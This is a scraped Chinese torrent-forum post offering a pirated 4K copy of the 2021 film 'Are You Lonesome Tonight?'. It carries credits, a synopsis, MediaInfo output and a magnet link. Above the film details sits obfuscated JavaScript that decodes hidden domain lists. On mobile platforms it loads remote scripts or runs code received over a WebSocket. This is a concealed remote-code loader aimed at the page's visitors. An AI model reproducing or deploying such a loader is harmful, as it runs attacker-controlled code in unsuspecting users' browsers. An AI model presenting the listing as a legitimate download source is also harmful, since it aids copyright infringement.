热带往事[国语音轨]Are.You.Lonesome.Tonight.2021.2160p.WEB-DL.DD5.1.H265-迅雷下载 10.83GB

版主小s 8天前 215

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 热带往事 / 犯罪概率 / Are You Lonesome Tonight?
◎年  代 2021
◎产  地 中国大陆
◎类  别 剧情 / 悬疑 / 犯罪
◎语  言 汉语普通话
◎上映日期 2021-06-12(中国大陆) / 2021-07-11(戛纳电影节)
◎IMDb链接 https://www.imdb.com/title/tt8519380/
◎豆瓣评分 6.5/10 (44587人评价)
◎豆瓣链接 https://movie.douban.com/subject/29984000/
◎片  长 95分钟
◎导  演 温仕培 Shipei Wen (id:1406021)
◎编  剧 赵秉昊 Binghao Zhao (id:1415788)
       王一诺 Yinuo Wang (id:1415789)
       温仕培 Shipei Wen (id:1406021)
       诺亚·道森 Noé Dodson (id:1456208)
◎演  员 彭于晏 Eddie Peng (id:1013782)
       张艾嘉 Sylvia Chang (id:1012646)
       王砚辉 Yanhui Wang (id:1322085)
       章宇 Yu Zhang (id:1322072)
       姜珮瑶 Peiyao Jiang (id:1367185)
       芦鑫 Xin Lu (id:1344715)
       陈永忠 Yongzhong Chen (id:1356496)
       邓飞 Fei Deng (id:1365659)
       王易冰 Yibing Wang (id:1381922)
       宋歌 Ge Song (id:1318488)
       董平 Ping Dong (id:1380636)
       李捷 Jie Li (id:1403835)
       程武 Wu Cheng (id:1406349)
       宁浩 Hao Ning (id:1274265)
       郁笑沣 Xiaofeng Yu (id:1417266)
       虎靖璇 Jingxuan Hu (id:1456209)
       王婧 Jing Wang (id:1444348)
       隋玉刚 Yugang Sui (id:1456218)
       李衡 Hank Lee (id:1444335)
       黄子珈 Zijia Huang (id:1313771)
       安德烈亚斯·塔尔哈默 Andreas Thalhammer (id:1456210)
       韩小苏 Xiaosu Han (id:1456211)
       刘彰 Cedric Cheung-Lau (id:1456212)
       张恒 Heng Zhang (id:1456213)
       朱琳 Lin Zhu (id:1378385)
       魏永 Yong Wei (id:1456215)
       董劼 Jie Dong (id:1456216)
       诺亚·道森 Noé Dodson (id:1456208)
       曹航琛 Hangchen Cao (id:1456217)
       张兆康 Ahong Cheung (id:1366935)
       许贵婷 Guiting Xu (id:1456214)
       鲁伟 Wei Lu (id:1382067)
       张兆康 Ahong Cheung (id:1366935)
       陈子晴 Dos Santos Chi-Ching Chan (id:1446040)
       杜笃之 Du-Che Tu (id:1275159)
       李丹枫 Danfeng Li (id:1401862)
       江宜真 Yi Chen Chiang (id:1416625)

◎标  签 犯罪 / 悬疑 / 文艺 / 剧情 / 中国大陆 / 2021 / 华语 / 人性

◎简  介
  南方炎热的夏日夜晚,年轻的王学明(彭于晏 饰)遭遇了一起意外。梁妈(张艾嘉 饰)的老公 忽然失踪,她寻求陈警官的帮助,却不知自己已成为别人的下一个“目标”。陈警官(王砚辉 饰)负责老梁 失踪案,他发现案情的发展远超自己掌控。这群不知命运已被悄然更改的人,都在试图窥视关于那个夜晚的真相,但这个夏夜的记忆如错乱的拼图,愈加扑朔迷离……

  1. General
  2. Unique ID                                : 239242822451153533287933591954483003188 (0xB3FC7DD7C87C6BEE09884C30495B3F34)
  3. Complete name                            : 热带往事[email protected]DDQ.COM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 10.8 GiB
  7. Duration                                 : 1 h 35 min
  8. Overall bit rate                         : 16.3 Mb/s
  9. Encoded date                             : UTC 2021-07-22 03:22:09
  10. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : HEVC
  15. Format/Info                              : High Efficiency Video Coding
  16. Format profile                           : [email protected]@Main
  17. Codec ID                                 : V_MPEGH/ISO/HEVC
  18. Duration                                 : 1 h 35 min
  19. Bit rate                                 : 16.0 Mb/s
  20. Width                                    : 3 840 pixels
  21. Height                                   : 1 608 pixels
  22. Display aspect ratio                     : 2.40:1
  23. Frame rate mode                          : Constant
  24. Frame rate                               : 24.000 FPS
  25. Color space                              : YUV
  26. Chroma subsampling                       : 4:2:0
  27. Bit depth                                : 8 bits
  28. Bits/(Pixel*Frame)                       : 0.108
  29. Stream size                              : 10.7 GiB (98%)
  30. Default                                  : Yes
  31. Forced                                   : No
  32. Audio
  33. ID                                       : 2
  34. Format                                   : E-AC-3
  35. Format/Info                              : Enhanced AC-3
  36. Commercial name                          : Dolby Digital Plus
  37. Codec ID                                 : A_EAC3
  38. Duration                                 : 1 h 35 min
  39. Bit rate mode                            : Constant
  40. Bit rate                                 : 256 kb/s
  41. Channel(s)                               : 6 channels
  42. Channel layout                           : L R C LFE Ls Rs
  43. Sampling rate                            : 48.0 kHz
  44. Frame rate                               : 31.250 FPS (1536 SPF)
  45. Compression mode                         : Lossy
  46. Stream size                              : 175 MiB (2%)
  47. Language                                 : Chinese
  48. Service kind                             : Complete Main
  49. Default                                  : Yes
  50. Forced                                   : No


TAGS 剧情 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:7286B04CE40D5C67A3154F7AA7ED999898FC2FB7
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖